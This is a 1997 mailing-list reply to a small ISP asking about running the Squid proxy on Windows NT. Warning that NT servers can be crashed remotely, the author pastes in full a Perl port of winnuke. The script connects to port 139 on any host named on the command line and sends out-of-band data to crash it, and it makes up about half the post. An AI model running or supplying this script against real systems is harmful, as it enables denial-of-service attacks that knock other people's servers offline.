Re: Squid for NT & Newbie questions

From: Mike Pelletier <mikep@dont-contact.us>
Date: Tue, 20 May 1997 11:00:37 -0400 (EDT)

On Tue, 20 May 1997, Neil Cotty wrote:
> Firstly, are there any plans to develop an NT port of the Squid Proxy or
> is there one already ? We are a very small ISP and are moving away from
> Unix to NT (for administration reasons). We have limited bandwidth and
> our backbone provider (thieves inc. :) ) have recently introduced Usage
> based pricing, so we now need an effective caching proxy server.

Make sure that you're aware of all the ways in which an NT server can be
crashed by anyone on the Internet before you throw an NT proxy server
online. NT isn't any more secure or out-of-the-box Internettable than
UNIX these days. Here's a Perl script that'll crash an NT server in an
instant. Not sure if there's a hotfix out for this problem or not, but
disabling the file sharing ports will help. This might work on any port,
though I haven't tried it.

        -Mike Pelletier.

------------
#!/usr/bin/perl

# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci

use strict; use Socket;

my($h,$p,$in_addr,$proto,$addr);

$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);
if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }

$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);
$proto = getprotobyname('tcp');
socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;

connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;

print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;